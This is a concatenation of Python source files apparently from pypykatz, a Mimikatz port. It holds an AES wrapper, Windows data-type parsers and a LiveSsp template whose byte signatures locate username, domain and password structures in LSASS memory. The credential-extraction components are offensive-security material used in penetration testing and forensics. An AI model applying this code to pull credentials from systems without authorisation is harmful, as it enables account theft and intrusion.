from pypykatz.crypto.unified.common import SYMMETRIC_MODE
	

class AES:
	def __init__(self, key, mode = SYMMETRIC_MODE.ECB, iv = None):
		self.key = key
		self.mode = mode
		self.iv = iv
		self.block_size = 16
		self.ctx = None
		self.setup()
		
	def setup(self):
		if self.mode == SYMMETRIC_MODE.ECB:
			self.ctx = AESModeOfOperationECB(self.key)
		elif self.mode == SYMMETRIC_MODE.CBC:
			self.ctx = AESModeOfOperationCBC(self.key, iv = self.iv)
		else:
			raise Exception('Unknown mode!')
		
	def encrypt(self, data):
		if len(data) % self.block_size != 0:
			raise Exception('Data size not matching blocksize!')
		res = b''
		for block in [data[i:i+self.block_size] for i in range(0, len(data), self.block_size)]:  #terrible, terrible workaround
			res += self.ctx.encrypt(block)
		return res
	
	def decrypt(self, data):
		if len(data) % self.block_size != 0:
			raise Exception('Data size not matching blocksize!')
		res = b''
		for block in [data[i:i+self.block_size] for i in range(0, len(data), self.block_size)]:  #terrible, terrible workaround
			res += self.ctx.decrypt(block)
		return res


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

# https://msdn.microsoft.com/en-us/library/windows/desktop/aa383751(v=vs.85).aspx
import enum

class POINTER:
	def __init__(self):
		self.location = None
		self.value = None
		self.finaltype = None

	@staticmethod
	async def loadvalue(reader, finaltype = None):
		p = await POINTER.load(reader, finaltype)
		return p.value
	
	@staticmethod
	async def load(reader, finaltype):
		p = POINTER()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = finaltype
		return p

	async def read(self, reader, override_finaltype = None):
		if self.value == 0:
			return None
		pos = reader.tell()
		await reader.move(self.value)
		if override_finaltype:
			data = await override_finaltype.load(reader)
		else:
			data = await self.finaltype.load(reader)
		await reader.move(pos)
		return data
	
	async def read_raw(self, reader, size ):
		#we do not know the finaltype, just want the data
		if self.value == 0:
			return None
		pos = reader.tell()
		await reader.move(self.value)
		data = await reader.read(size)
		await reader.move(pos)
		return data
		
class PVOID(POINTER):
	def __init__(self):
		super().__init__() #with void we cannot determine the final type
	
	@staticmethod
	async def loadvalue(reader):
		t = await PVOID.load(reader)
		return t.value

	@staticmethod
	async def load(reader, finaltype = None):
		p = PVOID()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = None
		return p
		
class BOOL:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await BOOL.load(reader)
		return t.value

	@staticmethod
	async def load(reader):
		res = BOOL()
		t = await reader.read_uint()
		res.value = bool(t)
		return res
		
class BOOLEAN:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await BOOLEAN.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = BOOLEAN()
		t = await reader.read(1)
		res.value = bool(t)
		return res
		
class BYTE:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await BYTE.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = BYTE()
		t = await reader.read(1)
		res.value = t
		return res
		
class PBYTE(POINTER):
	def __init__(self):
		super().__init__() #with void we cannot determine the final type
	
	@staticmethod
	async def load(reader):
		p = PBYTE()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = BYTE
		return p
	

class CCHAR:
	def __init__(self):
		self.value = None

	@staticmethod
	async def loadvalue(reader):
		t = await CCHAR.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = CCHAR()
		t = await reader.read(1)
		res.value = t.decode('ascii')
		return res
		
class CHAR:
	def __init__(self):
		self.value = None

	@staticmethod
	async def loadvalue(reader):
		t = await CHAR.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = CHAR()
		t = await reader.read(1)
		res.value = t.decode('ascii')
		return res
		
class UCHAR:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await UCHAR.load(reader)
		return t.value

	@staticmethod
	async def load(reader):
		res = UCHAR()
		t = await reader.read(1)
		res.value = int.from_bytes(t, byteorder = 'little', signed = False)
		return res

class WORD:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await WORD.load(reader)
		return t.value

	@staticmethod
	async def load(reader):
		res = WORD()
		t = await reader.read(2)
		res.value = int.from_bytes(t, byteorder = 'little', signed = False)
		return res

class DWORD:	
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await DWORD.load(reader)
		return t.value

	@staticmethod
	async def load(reader):
		res = DWORD()
		t = await reader.read(4)
		res.value = int.from_bytes(t, byteorder = 'little', signed = False)
		return res
		
class DWORDLONG:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await DWORDLONG.load(reader)
		return t.value

	@staticmethod
	async def load(reader):
		res = DWORDLONG()
		t = await reader.read(8)
		res.value = int.from_bytes(t, byteorder = 'little', signed = False)
		return res
		
class DWORD_PTR(POINTER):
	def __init__(self):
		super().__init__() #with void we cannot determine the final type
	@staticmethod
	async def load(reader):
		p = DWORD_PTR()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = DWORD
		return p
		
class DWORD32:
	def __init__(self):
		self.value = None

	@staticmethod
	async def loadvalue(reader):
		t = await DWORD32.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = DWORD32()
		t = await reader.read(4)
		res.value = int.from_bytes(t, byteorder = 'little', signed = False)
		return res

class DWORD64:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await DWORD64.load(reader)
		return t.value

	@staticmethod
	async def load(reader):
		res = DWORD64()
		t = await reader.read(8)
		res.value = int.from_bytes(t, byteorder = 'little', signed = False)
		return res

	
class HANDLE:	
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await HANDLE.load(reader)
		return t.value


	@staticmethod
	async def load(reader):
		res = HANDLE()
		res.value = await reader.read_uint()
		return res
		
class HFILE:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await HFILE.load(reader)
		return t.value

	@staticmethod
	async def load(reader):
		res = HFILE()
		res.value = await reader.read_uint()
		return res
		
class HINSTANCE:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await HINSTANCE.load(reader)
		return t.value


	@staticmethod
	async def load(reader):
		res = HINSTANCE()
		res.value = await reader.read_uint()
		return res
		

class HKEY:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await HKEY.load(reader)
		return t.value

	@staticmethod
	async def load(reader):
		res = HKEY()
		res.value = await reader.read_uint()
		return res


class HKL:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await HKL.load(reader)
		return t.value

	@staticmethod
	async def load(reader):
		res = HKL()
		res.value = await reader.read_uint()
		return res
		
class HLOCAL:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await HLOCAL.load(reader)
		return t.value


	@staticmethod
	async def load(reader):
		res = HLOCAL()
		res.value = await reader.read_uint()
		return res

class INT:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await INT.load(reader)
		return t.value

	@staticmethod
	async def load(reader):
		res = INT()
		res.value = await reader.read_int()
		return res
	

class INT_PTR(POINTER):
	def __init__(self):
		super().__init__() #with void we cannot determine the final type
	
	@staticmethod
	async def load(reader):
		p = INT_PTR()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = INT
		return p

class UINT8:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await UINT8.load(reader)
		return t.value

	@staticmethod
	async def load(reader):
		res = UINT8()
		t = await reader.read(1)
		res.value = int.from_bytes(t, byteorder = 'little', signed = False)
		return res

class INT8:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await INT8.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = INT8()
		t = await reader.read(1)
		res.value = int.from_bytes(t, byteorder = 'little', signed = True)
		return res

class INT16:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await INT16.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = INT16()
		t = await reader.read(2)
		res.value = int.from_bytes(t, byteorder = 'little', signed = True)
		return res

class INT32:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await INT32.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = INT32()
		t = await reader.read(4)
		res.value = int.from_bytes(t, byteorder = 'little', signed = True)
		return res

class INT64:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await INT64.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = INT64()
		t = await reader.read(8)
		res.value = int.from_bytes(t, byteorder = 'little', signed = True)
		return res

class LONG:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await LONG.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = LONG()
		t = await reader.read(4)
		res.value = int.from_bytes(t, byteorder = 'little', signed = True)
		return res

class LONGLONG:	
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await LONGLONG.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = LONGLONG()
		t = await reader.read(8)
		res.value = int.from_bytes(t, byteorder = 'little', signed = True)
		return res

class LONG_PTR(POINTER):
	def __init__(self):
		super().__init__() #with void we cannot determine the final type
	
	@staticmethod
	async def load(reader):
		p = LONG_PTR()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = LONG
		return p

class LONG32:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await LONG32.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = LONG32()
		t = await reader.read(4)
		res.value = int.from_bytes(t, byteorder = 'little', signed = True)
		return res

class LONG64():
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await LONG64.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = LONG64()
		t = await reader.read(8)
		res.value = int.from_bytes(t, byteorder = 'little', signed = True)
		return res

class LPARAM(POINTER):
	def __init__(self):
		super().__init__() #with void we cannot determine the final type
	
	@staticmethod
	async def load(reader):
		p = LPARAM()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = LONG
		return p

class LPBOOL(POINTER):	
	def __init__(self):
		super().__init__() #with void we cannot determine the final type
	
	@staticmethod
	async def load(reader):
		p = LPBOOL()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = BOOL
		return p

class LPBYTE(POINTER):	
	def __init__(self):
		super().__init__() #with void we cannot determine the final type
	
	@staticmethod
	async def load(reader):
		p = LPBYTE()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = BYTE
		return p

class ULONG:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await ULONG.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = ULONG()
		t = await reader.read(4)
		res.value = int.from_bytes(t, byteorder = 'little', signed = False)
		return res
		
class ULONGLONG:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await ULONGLONG.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = ULONGLONG()
		t = await reader.read(8)
		res.value = int.from_bytes(t, byteorder = 'little', signed = False)
		return res

class ULONG32:	
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await ULONG32.load(reader)
		return t.value

	
	@staticmethod
	async def load(reader):
		res = ULONG32()
		t = await reader.read(4)
		res.value = int.from_bytes(t, byteorder = 'little', signed = False)
		return res
		
class ULONG64:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await ULONG64.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = ULONG64()
		t = await reader.read(8)
		res.value = int.from_bytes(t, byteorder = 'little', signed = False)
		return res
		
class PWSTR(POINTER):
	def __init__(self):
		super().__init__() #with void we cannot determine the final type
	
	@staticmethod
	async def load(reader):
		p = PWSTR()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = None
		return p
		
class PCHAR(POINTER):
	def __init__(self):
		super().__init__() #with void we cannot determine the final type
	
	@staticmethod
	async def load(reader):
		p = PCHAR()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = CHAR
		return p
		
class USHORT:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await USHORT.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = USHORT()
		t = await reader.read(2)
		res.value = int.from_bytes(t, byteorder = 'little', signed = False)
		return res
		
class SHORT:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await SHORT.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = SHORT()
		t = await reader.read(2)
		res.value = int.from_bytes(t, byteorder = 'little', signed = True)
		return res
		
#https://msdn.microsoft.com/en-us/library/windows/hardware/ff554296(v=vs.85).aspx
class LIST_ENTRY:
	def __init__(self):
		self.Flink = None
		self.Blink = None

	@staticmethod
	async def load(reader, finaltype = None):
		res = LIST_ENTRY()
		res.Flink = await POINTER.load(reader, finaltype)
		res.Blink = await POINTER.load(reader, finaltype)
		return res
		
class FILETIME:
	def __init__(self):
		self.dwLowDateTime = None
		self.dwHighDateTime = None
		self.value = None

	@staticmethod
	async def loadvalue(reader):
		t = await FILETIME.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader, finaltype = None):
		res = FILETIME()
		res.dwLowDateTime = await DWORD.load(reader)
		res.dwHighDateTime = await DWORD.load(reader)
		res.value = (res.dwHighDateTime.value << 32) + res.dwLowDateTime.value
		return res
		
class PUCHAR(POINTER):
	def __init__(self):
		super().__init__() #with void we cannot determine the final type
	
	@staticmethod
	async def load(reader):
		p = PUCHAR()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = UCHAR
		return p
		
class PCWSTR(POINTER):
	def __init__(self):
		super().__init__() #with void we cannot determine the final type
	
	@staticmethod
	async def load(reader):
		p = PCWSTR()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = None
		return p
		
class SIZE_T:
	def __init__(self):
		self.value = None
	
	@staticmethod
	async def loadvalue(reader):
		t = await SIZE_T.load(reader)
		return t.value
	
	@staticmethod
	async def load(reader):
		res = SIZE_T()
		res.value = await reader.read_uint()
		return res

class LARGE_INTEGER:
	def __init__(self):
		self.LowPart = None
		self.HighPart = None
		self.QuadPart = None
	
	
	@staticmethod
	async def load(reader):
		res = LARGE_INTEGER()
		res.LowPart = await DWORD.loadvalue(reader)
		res.HighPart = await LONG.loadvalue(reader)
		res.QuadPart = await LONGLONG.loadvalue(reader)
		return res


class PSID(POINTER):
	def __init__(self):
		super().__init__()

	@staticmethod
	async def load(reader):
		p = PSID()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = SID
		return p

class SID:
	def __init__(self):
		self.Revision = None
		self.SubAuthorityCount = None
		self.IdentifierAuthority = None
		self.SubAuthority = []
	
	@staticmethod
	async def load(reader):
		res = SID()
		res.Revision = await UINT8.loadvalue(reader)
		res.SubAuthorityCount = await UINT8.loadvalue(reader)
		t = await reader.read(6)
		res.IdentifierAuthority = int.from_bytes(b'\x00\x00' + t, byteorder = 'big', signed = False)
		for _ in range(res.SubAuthorityCount):
			t = await ULONG.loadvalue(reader)
			res.SubAuthority.append(t)
		return res

	def __str__(self):
		t = 'S-%d-%d' % (self.Revision, self.IdentifierAuthority)
		for subauthority in self.SubAuthority:
			t+= '-%d' % (subauthority)
		return t
		
class LUID:
	def __init__(self):
		self.LowPart = None
		self.HighPart = None
		self.value = None

	@staticmethod
	async def loadvalue(reader):
		t = await LUID.load(reader)
		return t.value

	@staticmethod
	async def load(reader):
		res = LUID()
		res.LowPart = await DWORD.loadvalue(reader)
		res.HighPart = await LONG.loadvalue(reader)
		res.value = (res.HighPart << 32) + res.LowPart
		return res

		
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms721841(v=vs.85).aspx
class LSA_UNICODE_STRING:
	def __init__(self):
		self.Length = None
		self.MaximumLength = None
		self.Buffer = None

	@staticmethod
	async def load(reader):
		res = LSA_UNICODE_STRING()
		res.Length= await USHORT.loadvalue(reader)
		res.MaximumLength = await USHORT.loadvalue(reader)
		await reader.align()
		res.Buffer = await PWSTR.loadvalue(reader)
		return res
		
	async def read_string(self, reader):
		if self.Buffer == 0 or self.Length == 0:
			return ''
		await reader.move(self.Buffer)
		data = await reader.read(self.Length)
		data_str = data.decode('utf-16-le').rstrip('\0')
		return data_str
		
	async def read_data(self, reader):
		if self.Buffer == 0 or self.Length == 0:
			return b''
		await reader.move(self.Buffer)
		return await reader.read(self.Length)
		
	async def read_maxdata(self, reader):
		if self.Buffer == 0 or self.Length == 0:
			return b''
		await reader.move(self.Buffer)
		return await reader.read(self.MaximumLength)
		
# https://msdn.microsoft.com/en-us/library/windows/hardware/ff540605(v=vs.85).aspx
class PANSI_STRING(POINTER):
	def __init__(self):
		super().__init__()

	@staticmethod
	async def load(reader):
		p = PANSI_STRING()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = ANSI_STRING
		return p
		
class ANSI_STRING:
	def __init__(self):
		self.Length = None
		self.MaximumLength = None
		self.Buffer = None

	@staticmethod
	async def load(reader):
		res = ANSI_STRING()
		res.Length = await USHORT.loadvalue(reader)
		res.MaximumLength = await USHORT.loadvalue(reader)
		res.Buffer = await PCHAR.load(reader)
		return res
		
	async def read_string(self, reader):
		if self.Buffer == 0 or self.Length == 0:
			return ''
		await reader.move(self.Buffer)
		data = await reader.read(self.Length)
		data_str = data.decode().rstrip('\0')
		return data_str
		
	async def read_data(self, reader):
		if self.Buffer == 0 or self.Length == 0:
			return b''
		await reader.move(self.Buffer)
		return await reader.read(self.Length)

# https://msdn.microsoft.com/en-us/library/windows/desktop/aa378064(v=vs.85).aspx

class KerberosNameType(enum.Enum):
	KRB_NT_UNKNOWN = 0
	KRB_NT_PRINCIPAL = 1
	KRB_NT_PRINCIPAL_AND_ID = -131
	KRB_NT_SRV_INST = 2
	KRB_NT_SRV_INST_AND_ID = -132
	KRB_NT_SRV_HST = 3
	KRB_NT_SRV_XHST = 4
	KRB_NT_UID = 5
	KRB_NT_ENTERPRISE_PRINCIPAL = 10
	KRB_NT_ENT_PRINCIPAL_AND_ID = -130
	KRB_NT_MS_PRINCIPAL = -128
	KRB_NT_MS_PRINCIPAL_AND_ID = -129
	
class PKERB_EXTERNAL_NAME(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKERB_EXTERNAL_NAME()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KERB_EXTERNAL_NAME
		return p

class KERB_EXTERNAL_NAME:
	def __init__(self):
		self.NameType = None
		self.NameCount = None
		self.Names = []	# list of LSA_UNICODE_STRING
	
	@staticmethod
	async def load(reader):
		res = KERB_EXTERNAL_NAME()
		res.NameType = await SHORT.loadvalue(reader) #KerberosNameType(SHORT(reader).value)
		res.NameCount = await USHORT.loadvalue(reader)
		await reader.align()
		for _ in range(res.NameCount):
			t = await LSA_UNICODE_STRING.load(reader)
			res.Names.append(t)
		return res 
		
	async def read(self, reader):
		t = []
		for name in self.Names:
			x = await name.read_string(reader)
			t.append(x)
		return t
		
		
class KIWI_GENERIC_PRIMARY_CREDENTIAL:
	def __init__(self):
		self.UserName = None
		self.Domaine = None
		self.Password = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_GENERIC_PRIMARY_CREDENTIAL()
		res.UserName = await LSA_UNICODE_STRING.load(reader)
		res.Domaine  = await LSA_UNICODE_STRING.load(reader)
		res.Password = await LSA_UNICODE_STRING.load(reader)
		return res 

class PRTL_BALANCED_LINKS(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PRTL_BALANCED_LINKS()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = RTL_BALANCED_LINKS
		return p

class RTL_BALANCED_LINKS:
	def __init__(self):
		self.Parent = None
		self.LeftChild = None
		self.RightChild = None
		self.Balance = None
		self.Reserved = None
	
	@staticmethod
	async def load(reader):
		res = RTL_BALANCED_LINKS()
		res.Parent = await PRTL_BALANCED_LINKS.load(reader)
		res.LeftChild = await PRTL_BALANCED_LINKS.load(reader)
		res.RightChild = await PRTL_BALANCED_LINKS.load(reader)
		res.Balance = await BYTE.loadvalue(reader)
		res.Reserved = await reader.read(3) # // align
		await reader.align()
		return res 

class PRTL_AVL_TABLE(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PRTL_AVL_TABLE()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = RTL_AVL_TABLE
		return p
		
class RTL_AVL_TABLE:
	def __init__(self):
		self.BalancedRoot = None
		self.OrderedPointer = None
		self.WhichOrderedElement = None
		self.NumberGenericTableElements = None
		self.DepthOfTree = None
		self.RestartKey = None
		self.DeleteCount = None
		self.CompareRoutine = None
		self.AllocateRoutine = None
		self.FreeRoutine = None
		self.TableContext = None
	
	@staticmethod
	async def load(reader):
		res = RTL_AVL_TABLE()
		res.BalancedRoot = await RTL_BALANCED_LINKS.load(reader)
		res.OrderedPointer = await PVOID.load(reader)
		res.WhichOrderedElement = await ULONG.loadvalue(reader)
		res.NumberGenericTableElements = await ULONG.loadvalue(reader)
		res.DepthOfTree = await ULONG.loadvalue(reader)
		await reader.align()
		res.RestartKey = await PRTL_BALANCED_LINKS.load(reader)
		res.DeleteCount = await ULONG.loadvalue(reader)
		await reader.align()
		res.CompareRoutine = await PVOID.load(reader)
		res.AllocateRoutine = await PVOID.load(reader)
		res.FreeRoutine = await PVOID.load(reader)
		res.TableContext = await PVOID.load(reader)
		return res 

class PLSAISO_DATA_BLOB(POINTER):
	def __init__(self):
		super().__init__()

	@staticmethod
	async def load(reader):
		p = PLSAISO_DATA_BLOB()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = LSAISO_DATA_BLOB
		return p
		
class LSAISO_DATA_BLOB:
	size = 9*4 + 3*16 + 16 #+sizeof array ?ANYSIZE_ARRAY
	def __init__(self):
		self.structSize = None
		self.unk0 = None
		self.typeSize = None
		self.unk1 = None
		self.unk2 = None
		self.unk3 = None
		self.unk4 = None
		self.unkKeyData = None
		self.unkData2 = None
		self.unk5 = None
		self.origSize = None
		self.data = None #size determined later
	
	@staticmethod
	async def load(reader):
		res = LSAISO_DATA_BLOB()
		res.structSize = await DWORD.loadvalue(reader)
		res.unk0 = await DWORD.loadvalue(reader)
		res.typeSize = await DWORD.loadvalue(reader)
		res.unk1 = await DWORD.loadvalue(reader)
		res.unk2 = await DWORD.loadvalue(reader)
		res.unk3 = await DWORD.loadvalue(reader)
		res.unk4 = await DWORD.loadvalue(reader)
		res.unkKeyData = await reader.read(3*16)
		res.unkData2 = await reader.read(16)
		res.unk5 = await DWORD.loadvalue(reader)
		res.origSize = await DWORD.loadvalue(reader)
		res.data = None #size determined later
		return res 
		
		
class ENC_LSAISO_DATA_BLOB:
	def __init__(self):
		self.unkData1 = None
		self.unkData2 = None
		self.data = None
	
	@staticmethod
	async def load(reader):
		res = ENC_LSAISO_DATA_BLOB()
		res.unkData1 = await reader.read(16)
		res.unkData2 = await reader.read(16)
		res.data = None #size determined later
		return res 
		
class GUID:
	def __init__(self):
		self.Data1 = None
		self.Data2 = None
		self.Data3 = None
		self.Data4 = None
		self.value = None

	@staticmethod
	async def loadvalue(reader):
		t = await GUID.load(reader)
		return t.value

	
	@staticmethod
	async def load(reader):
		res = GUID()
		res.Data1 = await DWORD.loadvalue(reader)
		res.Data2 = await WORD.loadvalue(reader)
		res.Data3 = await WORD.loadvalue(reader)
		res.Data4 = await reader.read(8)
		res.value = '-'.join([
			hex(res.Data1)[2:].zfill(8), 
			hex(res.Data2)[2:].zfill(4), 
			hex(res.Data3)[2:].zfill(4), 
			hex(int.from_bytes(res.Data4[:2], byteorder = 'big', signed = False))[2:].zfill(4),
			hex(int.from_bytes(res.Data4[2:], byteorder = 'big', signed = False))[2:].zfill(12)
		])
		return res 

class PLIST_ENTRY(POINTER):
	def __init__(self):
		super().__init__()

	@staticmethod
	async def load(reader):
		p = PLIST_ENTRY()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = LIST_ENTRY
		return p
		



#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
import io
#from minidump.win_datatypes import *
from pypykatz.commons.common import KatzSystemArchitecture
from pypykatz.alsadecryptor.win_datatypes import POINTER, ULONG, \
	KIWI_GENERIC_PRIMARY_CREDENTIAL, PVOID, DWORD, LUID, LSA_UNICODE_STRING
from pypykatz.alsadecryptor.package_commons import PackageTemplate

class LiveSspTemplate(PackageTemplate):
	def __init__(self):
		super().__init__('LiveSsp')
		self.signature = None
		self.first_entry_offset = None
		self.list_entry = None
		
	@staticmethod
	def get_template(sysinfo):
		template = LiveSspTemplate()
		template.list_entry = PKIWI_LIVESSP_LIST_ENTRY
		template.log_template('list_entry', template.list_entry)
		
		if sysinfo.architecture == KatzSystemArchitecture.X64:	
			template.signature = b'\x74\x25\x8b'
			template.first_entry_offset = -7
			
		
		elif sysinfo.architecture == KatzSystemArchitecture.X86:
			template.signature = b'\x8b\x16\x39\x51\x24\x75\x08'
			template.first_entry_offset = -8
			
		else:
			raise Exception('Unknown architecture! %s' % sysinfo.architecture)

			
		return template
	

class PKIWI_LIVESSP_PRIMARY_CREDENTIAL(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_LIVESSP_PRIMARY_CREDENTIAL()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_LIVESSP_PRIMARY_CREDENTIAL
		return p
		
class KIWI_LIVESSP_PRIMARY_CREDENTIAL:
	def __init__(self):
		self.isSupp = None
		self.unk0 = None
		self.credentials = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_LIVESSP_PRIMARY_CREDENTIAL()
		res.isSupp = await ULONG.loadvalue(reader)
		res.unk0 = await ULONG.loadvalue(reader)
		res.credentials = await KIWI_GENERIC_PRIMARY_CREDENTIAL.load(reader)
		return res


class PKIWI_LIVESSP_LIST_ENTRY(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_LIVESSP_LIST_ENTRY()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_LIVESSP_LIST_ENTRY
		return p
		
class KIWI_LIVESSP_LIST_ENTRY:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.unk3 = None
		self.unk4 = None
		self.unk5 = None
		self.unk6 = None
		self.LocallyUniqueIdentifier = None
		self.UserName = None
		self.unk7 = None
		self.suppCreds = None

	@staticmethod
	async def load(reader):
		res = KIWI_LIVESSP_LIST_ENTRY()
		res.Flink = await PKIWI_LIVESSP_LIST_ENTRY.load(reader)
		res.Blink = await PKIWI_LIVESSP_LIST_ENTRY.load(reader)
		res.unk0 = await PVOID.load(reader)
		res.unk1 = await PVOID.load(reader)
		res.unk2 = await PVOID.load(reader)
		res.unk3 = await PVOID.load(reader)
		res.unk4 = await DWORD.loadvalue(reader)
		res.unk5 = await DWORD.loadvalue(reader)
		res.unk6 = await PVOID.load(reader)
		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
		res.UserName = await LSA_UNICODE_STRING.load(reader)
		res.unk7 = await PVOID.load(reader)
		res.suppCreds = await PKIWI_LIVESSP_PRIMARY_CREDENTIAL.load(reader)
		return res


import enum

# https://eljay.github.io/directx-sys/winapi/wincrypt/index.html
# https://doxygen.reactos.org/d7/d4a/wincrypt_8h.html
# impacket dpapi.py

from hashlib import sha1 as SHA1
from hashlib import sha512 as SHA512
from pypykatz.crypto.unified.aes import AES
from pypykatz.crypto.unified.des3 import DES3
from pypykatz.crypto.unified.common import SYMMETRIC_MODE


# Algorithm classes
ALG_CLASS_ANY                   = (0)
ALG_CLASS_SIGNATURE             = (1 << 13)
ALG_CLASS_MSG_ENCRYPT           = (2 << 13)
ALG_CLASS_DATA_ENCRYPT          = (3 << 13)
ALG_CLASS_HASH                  = (4 << 13)
ALG_CLASS_KEY_EXCHANGE          = (5 << 13)
ALG_CLASS_ALL                   = (7 << 13)

# Algorithm types
ALG_TYPE_ANY                    = (0)
ALG_TYPE_DSS                    = (1 << 9)
ALG_TYPE_RSA                    = (2 << 9)
ALG_TYPE_BLOCK                  = (3 << 9)
ALG_TYPE_STREAM                 = (4 << 9)
ALG_TYPE_DH                     = (5 << 9)
ALG_TYPE_SECURECHANNEL          = (6 << 9)
ALG_SID_ANY                     = (0)
ALG_SID_RSA_ANY                 = 0
ALG_SID_RSA_PKCS                = 1
ALG_SID_RSA_MSATWORK            = 2
ALG_SID_RSA_ENTRUST             = 3
ALG_SID_RSA_PGP                 = 4
ALG_SID_DSS_ANY                 = 0
ALG_SID_DSS_PKCS                = 1
ALG_SID_DSS_DMS                 = 2
ALG_SID_ECDSA                   = 3

# Block cipher sub ids
ALG_SID_DES                     = 1
ALG_SID_3DES                    = 3
ALG_SID_DESX                    = 4
ALG_SID_IDEA                    = 5
ALG_SID_CAST                    = 6
ALG_SID_SAFERSK64               = 7
ALG_SID_SAFERSK128              = 8
ALG_SID_3DES_112                = 9
ALG_SID_CYLINK_MEK              = 12
